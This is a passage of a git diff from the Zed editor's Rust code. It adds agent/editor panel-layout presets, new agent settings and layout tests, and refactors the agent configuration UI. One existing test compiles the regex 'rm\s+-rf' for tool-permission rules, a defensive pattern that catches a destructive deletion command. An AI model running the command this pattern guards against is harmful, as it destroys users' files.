PanelLayout { + const AGENT: Self = Self { + agent_dock: Some(DockPosition::Left), + project_panel_dock: Some(DockSide::Right), + outline_panel_dock: Some(DockSide::Right), + collaboration_panel_dock: Some(DockPosition::Right), + git_panel_dock: Some(DockPosition::Right), + notification_panel_button: Some(false), + }; + + const EDITOR: Self = Self { + agent_dock: Some(DockPosition::Right), + project_panel_dock: Some(DockSide::Left), + outline_panel_dock: Some(DockSide::Left), + collaboration_panel_dock: Some(DockPosition::Left), + git_panel_dock: Some(DockPosition::Left), + notification_panel_button: Some(true), + }; + + pub fn is_agent_layout(&self) -> bool { + *self == Self::AGENT + } + + pub fn is_editor_layout(&self) -> bool { + *self == Self::EDITOR + } + + fn read_from(content: &SettingsContent) -> Self { + Self { + agent_dock: content.agent.as_ref().and_then(|a| a.dock), + project_panel_dock: content.project_panel.as_ref().and_then(|p| p.dock), + outline_panel_dock: content.outline_panel.as_ref().and_then(|p| p.dock), + collaboration_panel_dock: content.collaboration_panel.as_ref().and_then(|p| p.dock), + git_panel_dock: content.git_panel.as_ref().and_then(|p| p.dock), + notification_panel_button: content.notification_panel.as_ref().and_then(|p| p.button), + } + } + + fn write_to(&self, settings: &mut SettingsContent) { + settings.agent.get_or_insert_default().dock = self.agent_dock; + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + settings.collaboration_panel.get_or_insert_default().dock = self.collaboration_panel_dock; + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + settings.notification_panel.get_or_insert_default().button = self.notification_panel_button; + } + + fn write_diff_to(&self, current_merged: &PanelLayout, settings: &mut SettingsContent) { + if self.agent_dock != current_merged.agent_dock { + settings.agent.get_or_insert_default().dock = self.agent_dock; + } + if self.project_panel_dock != current_merged.project_panel_dock { + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + } + if self.outline_panel_dock != current_merged.outline_panel_dock { + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + } + if self.collaboration_panel_dock != current_merged.collaboration_panel_dock { + settings.collaboration_panel.get_or_insert_default().dock = + self.collaboration_panel_dock; + } + if self.git_panel_dock != current_merged.git_panel_dock { + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + } + if self.notification_panel_button != current_merged.notification_panel_button { + settings.notification_panel.get_or_insert_default().button = + self.notification_panel_button; + } + } + + fn backfill_to(&self, user_layout: &PanelLayout, settings: &mut SettingsContent) { + if user_layout.agent_dock.is_none() { + settings.agent.get_or_insert_default().dock = self.agent_dock; + } + if user_layout.project_panel_dock.is_none() { + settings.project_panel.get_or_insert_default().dock = self.project_panel_dock; + } + if user_layout.outline_panel_dock.is_none() { + settings.outline_panel.get_or_insert_default().dock = self.outline_panel_dock; + } + if user_layout.collaboration_panel_dock.is_none() { + settings.collaboration_panel.get_or_insert_default().dock = + self.collaboration_panel_dock; + } + if user_layout.git_panel_dock.is_none() { + settings.git_panel.get_or_insert_default().dock = self.git_panel_dock; + } + if user_layout.notification_panel_button.is_none() { + settings.notification_panel.get_or_insert_default().button = + self.notification_panel_button; + } + } +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum WindowLayout { + Editor(Option), + Agent(Option), + Custom(PanelLayout), +} + +impl WindowLayout { + pub fn agent() -> Self { + Self::Agent(None) + } + + pub fn editor() -> Self { + Self::Editor(None) + } +} + #[derive(Clone, Debug, RegisterSetting)] pub struct AgentSettings { pub enabled: bool, pub button: bool, pub dock: DockPosition, + pub flexible: bool, + pub sidebar_side: SidebarDockPosition, pub default_width: Pixels, pub default_height: Pixels, pub default_model: Option, @@ -36,21 +162,23 @@ pub struct AgentSettings { pub inline_alternatives: Vec, pub favorite_models: Vec, pub default_profile: AgentProfileId, - pub default_view: DefaultAgentView, pub profiles: IndexMap, pub notify_when_agent_waiting: NotifyWhenAgentWaiting, - pub play_sound_when_agent_done: bool, + pub play_sound_when_agent_done: PlaySoundWhenAgentDone, pub single_file_review: bool, pub model_parameters: Vec, pub enable_feedback: bool, pub expand_edit_card: bool, pub expand_terminal_card: bool, + pub thinking_display: ThinkingBlockDisplay, pub cancel_generation_on_terminal_stop: bool, pub use_modifier_to_send: bool, pub message_editor_min_lines: usize, pub show_turn_stats: bool, + pub show_merge_conflict_indicator: bool, pub tool_permissions: ToolPermissions, + pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -76,6 +204,13 @@ impl AgentSettings { return None; } + pub fn sidebar_side(&self) -> SidebarSide { + match self.sidebar_side { + SidebarDockPosition::Left => SidebarSide::Left, + SidebarDockPosition::Right => SidebarSide::Right, + } + } + pub fn set_message_editor_max_lines(&self) -> usize { self.message_editor_min_lines * 2 } @@ -86,6 +221,62 @@ impl AgentSettings { .map(|sel| ModelId::new(format!("{}/{}", sel.provider.0, sel.model))) .collect() } + + pub fn get_layout(cx: &App) -> WindowLayout { + let store = cx.global::(); + let merged = store.merged_settings(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + let merged_layout = PanelLayout::read_from(merged); + + if merged_layout.is_agent_layout() { + return WindowLayout::Agent(Some(user_layout)); + } + + if merged_layout.is_editor_layout() { + return WindowLayout::Editor(Some(user_layout)); + } + + WindowLayout::Custom(user_layout) + } + + pub fn backfill_editor_layout(fs: Arc, cx: &App) { + let user_layout = cx + .global::() + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::EDITOR.backfill_to(&user_layout, settings); + }); + } + + pub fn set_layout(layout: WindowLayout, fs: Arc, cx: &App) { + let merged = PanelLayout::read_from(cx.global::().merged_settings()); + + match layout { + WindowLayout::Agent(None) => { + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::AGENT.write_diff_to(&merged, settings); + }); + } + WindowLayout::Editor(None) => { + update_settings_file(fs, cx, move |settings, _cx| { + PanelLayout::EDITOR.write_diff_to(&merged, settings); + }); + } + WindowLayout::Agent(Some(saved)) + | WindowLayout::Editor(Some(saved)) + | WindowLayout::Custom(saved) => { + update_settings_file(fs, cx, move |settings, _cx| { + saved.write_to(settings); + }); + } + } + } } #[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize, Deserialize, JsonSchema)] @@ -406,8 +597,10 @@ impl Settings for AgentSettings { enabled: agent.enabled.unwrap(), button: agent.button.unwrap(), dock: agent.dock.unwrap(), + sidebar_side: agent.sidebar_side.unwrap(), default_width: px(agent.default_width.unwrap()), default_height: px(agent.default_height.unwrap()), + flexible: agent.flexible.unwrap(), default_model: Some(agent.default_model.unwrap()), inline_assistant_model: agent.inline_assistant_model, inline_assistant_use_streaming_tools: agent @@ -418,7 +611,6 @@ impl Settings for AgentSettings { inline_alternatives: agent.inline_alternatives.unwrap_or_default(), favorite_models: agent.favorite_models, default_profile: AgentProfileId(agent.default_profile.unwrap()), - default_view: agent.default_view.unwrap(), profiles: agent .profiles .unwrap() @@ -427,17 +619,20 @@ impl Settings for AgentSettings { .collect(), notify_when_agent_waiting: agent.notify_when_agent_waiting.unwrap(), - play_sound_when_agent_done: agent.play_sound_when_agent_done.unwrap(), + play_sound_when_agent_done: agent.play_sound_when_agent_done.unwrap_or_default(), single_file_review: agent.single_file_review.unwrap(), model_parameters: agent.model_parameters, enable_feedback: agent.enable_feedback.unwrap(), expand_edit_card: agent.expand_edit_card.unwrap(), expand_terminal_card: agent.expand_terminal_card.unwrap(), + thinking_display: agent.thinking_display.unwrap(), cancel_generation_on_terminal_stop: agent.cancel_generation_on_terminal_stop.unwrap(), use_modifier_to_send: agent.use_modifier_to_send.unwrap(), message_editor_min_lines: agent.message_editor_min_lines.unwrap(), show_turn_stats: agent.show_turn_stats.unwrap(), + show_merge_conflict_indicator: agent.show_merge_conflict_indicator.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), + new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } @@ -539,10 +734,19 @@ fn compile_regex_rules( #[cfg(test)] mod tests { use super::*; + use gpui::{TestAppContext, UpdateGlobal}; use serde_json::json; use settings::ToolPermissionMode; use settings::ToolPermissionsContent; + fn set_agent_v2_defaults(cx: &mut gpui::App) { + SettingsStore::update_global(cx, |store, cx| { + store.update_default_settings(cx, |defaults| { + PanelLayout::AGENT.write_to(defaults); + }); + }); + } + #[test] fn test_compiled_regex_case_insensitive() { let regex = CompiledRegex::new("rm\\s+-rf", false).unwrap(); @@ -1015,4 +1219,282 @@ mod tests { let permissions = compile_tool_permissions(Some(content)); assert_eq!(permissions.default, ToolPermissionMode::Deny); } + + #[gpui::test] + fn test_get_layout(cx: &mut gpui::App) { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Test defaults are editor layout; switch to agent V2. + set_agent_v2_defaults(cx); + + // Should be Agent with an empty user layout (user hasn't customized). + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Agent(Some(user_layout)) = layout else { + panic!("expected Agent(Some), got {:?}", layout); + }; + assert_eq!(user_layout, PanelLayout::default()); + + // User explicitly sets agent dock to left (matching the default). + // The merged result is still agent, but the user layout captures + // only what the user wrote. + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings(r#"{ "agent": { "dock": "left" } }"#, cx) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Agent(Some(user_layout)) = layout else { + panic!("expected Agent(Some), got {:?}", layout); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, None); + assert_eq!(user_layout.outline_panel_dock, None); + assert_eq!(user_layout.collaboration_panel_dock, None); + assert_eq!(user_layout.git_panel_dock, None); + assert_eq!(user_layout.notification_panel_button, None); + + // User sets a combination that doesn't match either preset: + // agent on the left but project panel also on the left. + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }"#, + cx, + ) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Custom(user_layout) = layout else { + panic!("expected Custom, got {:?}", layout); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Left)); + } + + #[gpui::test] + fn test_set_layout_round_trip(cx: &mut gpui::App) { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // User has a custom layout: agent on the right with project panel + // also on the right. This doesn't match either preset. + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "right" }, + "project_panel": { "dock": "right" } + }"#, + cx, + ) + .unwrap(); + }); + + let original = AgentSettings::get_layout(cx); + let WindowLayout::Custom(ref original_user_layout) = original else { + panic!("expected Custom, got {:?}", original); + }; + assert_eq!(original_user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!( + original_user_layout.project_panel_dock, + Some(DockSide::Right) + ); + assert_eq!(original_user_layout.outline_panel_dock, None); + + // Switch to the agent layout. This overwrites the user settings. + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + PanelLayout::AGENT.write_to(settings); + }); + }); + + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Agent(_))); + + // Restore the original custom layout. + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |settings| { + original_user_layout.write_to(settings); + }); + }); + + // Should be back to the same custom layout. + let restored = AgentSettings::get_layout(cx); + let WindowLayout::Custom(restored_user_layout) = restored else { + panic!("expected Custom, got {:?}", restored); + }; + assert_eq!(restored_user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!( + restored_user_layout.project_panel_dock, + Some(DockSide::Right) + ); + assert_eq!(restored_user_layout.outline_panel_dock, None); + } + + #[gpui::test] + async fn test_set_layout_minimal_diff(cx: &mut TestAppContext) { + let fs = fs::FakeFs::new(cx.background_executor.clone()); + fs.save( + paths::settings_file().as_path(), + &serde_json::json!({ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }) + .to_string() + .into(), + Default::default(), + ) + .await + .unwrap(); + + cx.update(|cx| { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Apply the agent V2 defaults. + set_agent_v2_defaults(cx); + + // User has agent=left (matches preset) and project_panel=left (does not) + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings( + r#"{ + "agent": { "dock": "left" }, + "project_panel": { "dock": "left" } + }"#, + cx, + ) + .unwrap(); + }); + + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Custom(_))); + + AgentSettings::set_layout(WindowLayout::agent(), fs.clone(), cx); + }); + + cx.run_until_parked(); + + let written = fs.load(paths::settings_file().as_path()).await.unwrap(); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.set_user_settings(&written, cx).unwrap(); + }); + + // The user settings should still have agent=left (preserved) + // and now project_panel=right (changed to match preset). + let store = cx.global::(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + assert_eq!(user_layout.agent_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + // Other fields weren't in user settings and didn't need changing. + assert_eq!(user_layout.outline_panel_dock, None); + + // And the merged result should now match agent. + let layout = AgentSettings::get_layout(cx); + assert!(matches!(layout, WindowLayout::Agent(_))); + }); + } + + #[gpui::test] + async fn test_backfill_editor_layout(cx: &mut TestAppContext) { + let fs = fs::FakeFs::new(cx.background_executor.clone()); + // User has only customized project_panel to "right". + fs.save( + paths::settings_file().as_path(), + &serde_json::json!({ + "project_panel": { "dock": "right" } + }) + .to_string() + .into(), + Default::default(), + ) + .await + .unwrap(); + + cx.update(|cx| { + let store = SettingsStore::test(cx); + cx.set_global(store); + project::DisableAiSettings::register(cx); + AgentSettings::register(cx); + + // Simulate pre-migration state: editor defaults (the old world). + SettingsStore::update_global(cx, |store, cx| { + store.update_default_settings(cx, |defaults| { + PanelLayout::EDITOR.write_to(defaults); + }); + }); + + // User has only customized project_panel to "right". + SettingsStore::update_global(cx, |store, cx| { + store + .set_user_settings(r#"{ "project_panel": { "dock": "right" } }"#, cx) + .unwrap(); + }); + + // Run the one-time backfill while still on old defaults. + AgentSettings::backfill_editor_layout(fs.clone(), cx); + }); + + cx.run_until_parked(); + + // Read back the file and apply it, then switch to agent V2 defaults. + let written = fs.load(paths::settings_file().as_path()).await.unwrap(); + cx.update(|cx| { + SettingsStore::update_global(cx, |store, cx| { + store.set_user_settings(&written, cx).unwrap(); + }); + + // The user's project_panel=right should be preserved (they set it). + // All other fields should now have the editor preset values + // written into user settings. + let store = cx.global::(); + let user_layout = store + .raw_user_settings() + .map(|u| PanelLayout::read_from(u.content.as_ref())) + .unwrap_or_default(); + + assert_eq!(user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + assert_eq!(user_layout.outline_panel_dock, Some(DockSide::Left)); + assert_eq!( + user_layout.collaboration_panel_dock, + Some(DockPosition::Left) + ); + assert_eq!(user_layout.git_panel_dock, Some(DockPosition::Left)); + assert_eq!(user_layout.notification_panel_button, Some(true)); + + // Now switch defaults to agent V2. + set_agent_v2_defaults(cx); + + // Even though defaults are now agent, the backfilled user settings + // keep everything in the editor layout. The user's experience + // hasn't changed. + let layout = AgentSettings::get_layout(cx); + let WindowLayout::Custom(user_layout) = layout else { + panic!( + "expected Custom (editor values override agent defaults), got {:?}", + layout + ); + }; + assert_eq!(user_layout.agent_dock, Some(DockPosition::Right)); + assert_eq!(user_layout.project_panel_dock, Some(DockSide::Right)); + }); + } } diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 2a31781054fd29b30a3c8119e87491edbfb1e658..e505a124b6898953db9751ddfc8ab98cb7f496f0 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -14,7 +14,6 @@ doctest = false [features] test-support = [ - "assistant_text_thread/test-support", "acp_thread/test-support", "eval_utils", "gpui/test-support", @@ -23,6 +22,7 @@ test-support = [ "workspace/test-support", "agent/test-support", ] +audio = ["dep:audio"] unit-eval = [] [dependencies] @@ -34,17 +34,13 @@ agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true anyhow.workspace = true -arrayvec.workspace = true -assistant_text_thread.workspace = true -assistant_slash_command.workspace = true -assistant_slash_commands.workspace = true -audio.workspace = true +heapless.workspace = true +audio = { workspace = true, optional = true } base64.workspace = true buffer_diff.workspace = true chrono.workspace = true client.workspace = true cloud_api_types.workspace = true -cloud_llm_client.workspace = true collections.workspace = true command_palette_hooks.workspace = true component.workspace = true @@ -58,6 +54,7 @@ feature_flags.workspace = true file_icons.workspace = true fs.workspace = true futures.workspace = true +git.workspace = true fuzzy.workspace = true gpui.workspace = true gpui_tokio.workspace = true @@ -88,7 +85,6 @@ release_channel.workspace = true rope.workspace = true rules_library.workspace = true schemars.workspace = true -search.workspace = true serde.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true @@ -101,6 +97,7 @@ terminal.workspace = true terminal_view.workspace = true text.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true time_format.workspace = true ui.workspace = true @@ -112,15 +109,13 @@ watch.workspace = true workspace.workspace = true zed_actions.workspace = true image.workspace = true -async-fs.workspace = true reqwest_client = { workspace = true, optional = true } [dev-dependencies] acp_thread = { workspace = true, features = ["test-support"] } agent = { workspace = true, features = ["test-support"] } -assistant_text_thread = { workspace = true, features = ["test-support"] } buffer_diff = { workspace = true, features = ["test-support"] } -clock.workspace = true + db = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } eval_utils.workspace = true @@ -131,11 +126,9 @@ languages = { workspace = true, features = ["test-support"] } language_model = { workspace = true, "features" = ["test-support"] } pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } -remote_connection = { workspace = true, features = ["test-support"] } -title_bar = { workspace = true, features = ["test-support"] } + semver.workspace = true reqwest_client.workspace = true -tempfile.workspace = true + tree-sitter-md.workspace = true unindent.workspace = true diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index 9126d289c94563e99d9bda2212bda5259e9e4fa3..fda3cb9907b2f02cce29ff0ae8c4762e6efa625a 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -4,7 +4,7 @@ mod configure_context_server_tools_modal; mod manage_profiles_modal; mod tool_picker; -use std::{ops::Range, sync::Arc}; +use std::{ops::Range, rc::Rc, sync::Arc}; use agent::ContextServerRegistry; use anyhow::Result; @@ -28,14 +28,14 @@ use language_model::{ use language_models::AllLanguageModelSettings; use notifications::status_toast::{StatusToast, ToastIcon}; use project::{ - agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource}, + agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource}, context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore}, }; use settings::{Settings, SettingsStore, update_settings_file}; use ui::{ - ButtonStyle, Chip, CommonAnimationExt, ContextMenu, ContextMenuEntry, Disclosure, Divider, - DividerColor, ElevationIndex, Indicator, LabelSize, PopoverMenu, Switch, Tooltip, - WithScrollbar, prelude::*, + AiSettingItem, AiSettingItemSource, AiSettingItemStatus, ButtonStyle, Chip, ContextMenu, + ContextMenuEntry, Disclosure, Divider, DividerColor, ElevationIndex, LabelSize, PopoverMenu, + Switch, Tooltip, WithScrollbar, prelude::*, }; use util::ResultExt as _; use workspace::{Workspace, create_and_open_local_file}; @@ -45,29 +45,32 @@ pub(crate) use configure_context_server_modal::ConfigureContextServerModal; pub(crate) use configure_context_server_tools_modal::ConfigureContextServerToolsModal; pub(crate) use manage_profiles_modal::ManageProfilesModal; -use crate::agent_configuration::add_llm_provider_modal::{ - AddLlmProviderModal, LlmCompatibleProvider, +use crate::{ + Agent, + agent_configuration::add_llm_provider_modal::{AddLlmProviderModal, LlmCompatibleProvider}, + agent_connection_store::{AgentConnectionStatus, AgentConnectionStore}, }; pub struct AgentConfiguration { fs: Arc, language_registry: Arc, agent_server_store: Entity, + agent_connection_store: Entity, workspace: WeakEntity, focus_handle: FocusHandle, configuration_views_by_provider: HashMap, context_server_store: Entity, expanded_provider_configurations: HashMap, context_server_registry: Entity, - _registry_subscription: Subscription, + _subscriptions: Vec, scroll_handle: ScrollHandle, - _check_for_gemini: Task<()>, } impl AgentConfiguration { pub fn new( fs: Arc, agent_server_store: Entity, + agent_connection_store: Entity, context_server_store: Entity, context_server_registry: Entity, language_registry: Arc, @@ -77,25 +80,27 @@ impl AgentConfiguration { ) -> Self { let focus_handle = cx.focus_handle(); - let registry_subscription = cx.subscribe_in( - &LanguageModelRegistry::global(cx), - window, - |this, _, event: &language_model::Event, window, cx| match event { - language_model::Event::AddedProvider(provider_id) => { - let provider = LanguageModelRegistry::read_global(cx).provider(provider_id); - if let Some(provider) = provider { - this.add_provider_configuration_view(&provider, window, cx); + let subscriptions = vec![ + cx.subscribe_in( + &LanguageModelRegistry::global(cx), + window, + |this, _, event: &language_model::Event, window, cx| match event { + language_model::Event::AddedProvider(provider_id) => { + let provider = LanguageModelRegistry::read_global(cx).provider(provider_id); + if let Some(provider) = provider { + this.add_provider_configuration_view(&provider, window, cx); + } } - } - language_model::Event::RemovedProvider(provider_id) => { - this.remove_provider_configuration_view(provider_id); - } - _ => {} - }, - ); - - cx.subscribe(&context_server_store, |_, _, _, cx| cx.notify()) - .detach(); + language_model::Event::RemovedProvider(provider_id) => { + this.remove_provider_configuration_view(provider_id); + } + _ => {} + }, + ), + cx.subscribe(&agent_server_store, |_, _, _, cx| cx.notify()), + cx.observe(&agent_connection_store, |_, _, cx| cx.notify()), + cx.subscribe(&context_server_store, |_, _, _, cx| cx.notify()), + ]; let mut this = Self { fs, @@ -104,13 +109,14 @@ impl AgentConfiguration { focus_handle, configuration_views_by_provider: HashMap::default(), agent_server_store, + agent_connection_store, context_server_store, expanded_provider_configurations: HashMap::default(), context_server_registry, - _registry_subscription: registry_subscription, + _subscriptions: subscriptions, scroll_handle: ScrollHandle::new(), - _check_for_gemini: Task::ready(()), }; + this.build_provider_configuration_views(window, cx); this } @@ -228,6 +234,7 @@ impl AgentConfiguration { .unwrap_or(false); v_flex() + .min_w_0() .w_full() .when(is_expanded, |this| this.mb_2()) .child( @@ -312,6 +319,7 @@ impl AgentConfiguration { ) .child( v_flex() + .min_w_0() .w_full() .px_2() .gap_1() @@ -330,10 +338,11 @@ impl AgentConfiguration { .full_width() .style(ButtonStyle::Outlined) .layer(ElevationIndex::ModalSurface) - .icon_position(IconPosition::Start) - .icon(IconName::Thread) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Thread) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -355,10 +364,11 @@ impl AgentConfiguration { ) .full_width() .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Trash) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -424,10 +434,11 @@ impl AgentConfiguration { .trigger( Button::new("add-provider", "Add Provider") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -459,6 +470,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .w_full() .child(self.render_section_title( "LLM Providers", @@ -498,6 +510,7 @@ impl AgentConfiguration { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; @@ -510,21 +523,18 @@ impl AgentConfiguration { } } - fn render_context_servers_section( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement { + fn render_context_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let context_server_ids = self.context_server_store.read(cx).server_ids(); let add_server_popover = PopoverMenu::new("add-server-popover") .trigger( Button::new("add-server", "Add Server") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -559,6 +569,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child(self.render_section_title( @@ -592,7 +603,7 @@ impl AgentConfiguration { } else { parent.children(itertools::intersperse_with( context_server_ids.iter().cloned().map(|context_server_id| { - self.render_context_server(context_server_id, window, cx) + self.render_context_server(context_server_id, cx) .into_any_element() }), || { @@ -609,7 +620,6 @@ impl AgentConfiguration { fn render_context_server( &self, context_server_id: ContextServerId, - window: &mut Window, cx: &Context, ) -> impl use<> + IntoElement { let server_status = self @@ -632,11 +642,30 @@ impl AgentConfiguration { ) }); + let display_name = if provided_by_extension { + resolve_extension_for_context_server(&context_server_id, cx) + .map(|(_, manifest)| { + let name = manifest.name.as_str(); + let stripped = name + .strip_suffix(" MCP Server") + .or_else(|| name.strip_suffix(" MCP")) + .or_else(|| name.strip_suffix(" Context Server")) + .unwrap_or(name); + SharedString::from(stripped.to_string()) + }) + .unwrap_or_else(|| item_id.clone()) + } else { + item_id.clone() + }; + let error = if let ContextServerStatus::Error(error) = server_status.clone() { Some(error) } else { None }; + let auth_required = matches!(server_status, ContextServerStatus::AuthRequired); + let authenticating = matches!(server_status, ContextServerStatus::Authenticating); + let context_server_store = self.context_server_store.clone(); let tool_count = self .context_server_registry @@ -644,47 +673,31 @@ impl AgentConfiguration { .tools_for_server(&context_server_id) .count(); - let (source_icon, source_tooltip) = if provided_by_extension { - ( - IconName::ZedSrcExtension, - "This MCP server was installed from an extension.", - ) + let source = if provided_by_extension { + AiSettingItemSource::Extension } else { - ( - IconName::ZedSrcCustom, - "This custom MCP server was installed directly.", - ) + AiSettingItemSource::Custom }; - let (status_indicator, tooltip_text) = match server_status { - ContextServerStatus::Starting => ( - Icon::new(IconName::LoadCircle) - .size(IconSize::XSmall) - .color(Color::Accent) - .with_keyed_rotate_animation( - SharedString::from(format!("{}-starting", context_server_id.0)), - 3, - ) - .into_any_element(), - "Server is starting.", - ), - ContextServerStatus::Running => ( - Indicator::dot().color(Color::Success).into_any_element(), - "Server is active.", - ), - ContextServerStatus::Error(_) => ( - Indicator::dot().color(Color::Error).into_any_element(), - "Server has an error.", - ), - ContextServerStatus::Stopped => ( - Indicator::dot().color(Color::Muted).into_any_element(), - "Server is stopped.", - ), + let status = match server_status { + ContextServerStatus::Starting => AiSettingItemStatus::Starting, + ContextServerStatus::Running => AiSettingItemStatus::Running, + ContextServerStatus::Error(_) => AiSettingItemStatus::Error, + ContextServerStatus::Stopped => AiSettingItemStatus::Stopped, + ContextServerStatus::AuthRequired => AiSettingItemStatus::AuthRequired, + ContextServerStatus::Authenticating => AiSettingItemStatus::Authenticating, }; + let is_remote = server_configuration .as_ref() .map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. })) .unwrap_or(false); + + let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| { + matches!(config.as_ref(), ContextServerConfiguration::Http { .. }) + && !config.has_static_auth_header() + }); + let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu") .trigger_with_tooltip( IconButton::new("context-server-config-menu", IconName::Settings) @@ -699,6 +712,7 @@ impl AgentConfiguration { let language_registry = self.language_registry.clone(); let workspace = self.workspace.clone(); let context_server_registry = self.context_server_registry.clone(); + let context_server_store = context_server_store.clone(); move |window, cx| { Some(ContextMenu::build(window, cx, |menu, _window, _cx| { @@ -745,6 +759,17 @@ impl AgentConfiguration { .ok(); } })) + .when(should_show_logout_button, |this| { + this.entry("Log Out", None, { + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); + }); + } + }) + }) .separator() .entry("Uninstall", None, { let fs = fs.clone(); @@ -801,147 +826,168 @@ impl AgentConfiguration { } }); - v_flex() - .id(item_id.clone()) - .child( - h_flex() - .justify_between() + let feedback_base_container = + || h_flex().py_1().min_w_0().w_full().gap_1().justify_between(); + + let details: Option = if let Some(error) = error { + Some( + feedback_base_container() .child( h_flex() - .flex_1() + .pr_4() .min_w_0() + .w_full() + .gap_2() .child( - h_flex() - .id(format!("tooltip-{}", item_id)) - .h_full() - .w_3() - .mr_2() - .justify_center() - .tooltip(Tooltip::text(tooltip_text)) - .child(status_indicator), - ) - .child(Label::new(item_id).truncate()) - .child( - div() - .id("extension-source") - .mt_0p5() - .mx_1() - .flex_none() - .tooltip(Tooltip::text(source_tooltip)) - .child( - Icon::new(source_icon) - .size(IconSize::Small) - .color(Color::Muted), - ), + Icon::new(IconName::XCircle) + .size(IconSize::XSmall) + .color(Color::Error), ) - 